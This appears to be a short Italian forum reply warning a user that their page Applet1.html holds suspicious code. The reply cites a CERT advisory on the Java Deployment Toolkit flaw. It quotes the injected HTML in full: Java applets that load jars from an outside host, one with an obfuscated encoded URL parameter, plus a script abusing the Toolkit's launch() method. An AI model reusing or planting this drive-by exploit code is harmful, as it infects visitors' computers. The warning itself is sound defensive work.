Questo codice è tuo?
Se è tuo considera che il Java Deployment Toolkit è soggetto ad una grave vulnerabilità:codice:<html> <head> <title>Bob's Homepage</title> </head> <body> <applet width='100%' height='100%' code='JavaFX' archive='Games.jar'> <param name='site' VALUE='Njg3NDc0NzAzQTJGMkY2NzZDNkY2RjZENzk2MjZDNjE2MzZCMkU2OTZFNjY2RjNBMzgzMDM4MzAyRjc3NjU2QzYzNkY2RDY1MkU3MDY4NzAzRjY5NjQzRDMxMzEyNjcwNjk2NDNEMzEyNjYx'> </applet> <applet code='quote.GReader.class' archive='NewGames.jar' width='288' height='175'> <param name='data' VALUE='http://gloomyblack.info:8080/welcome.php?id=9&pid=1&1=1'> <param name='cc' value='1'> </applet> <script> var u = "http: ......"; if (window.navigator.appName == "Microsoft Internet Explorer") { var o = document.createElement("OBJECT"); o.classid = "clsid:CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA"; o.launch(u); } else { var o = document.createElement("OBJECT"); var n = document.createElement("OBJECT"); o.type = "application/npruntime-scriptable-plugin;deploymenttoolkit"; n.type = "application/java-deployment-toolkit"; document.body.appendChild(o); document.body.appendChild(n); try { o.launch(u); } catch (e) { n.launch(u);
http://www.kb.cert.org/vuls/id/886582
Se non è tuo cancella immediatamente la pagina Applet1.html.
Rispondi quotando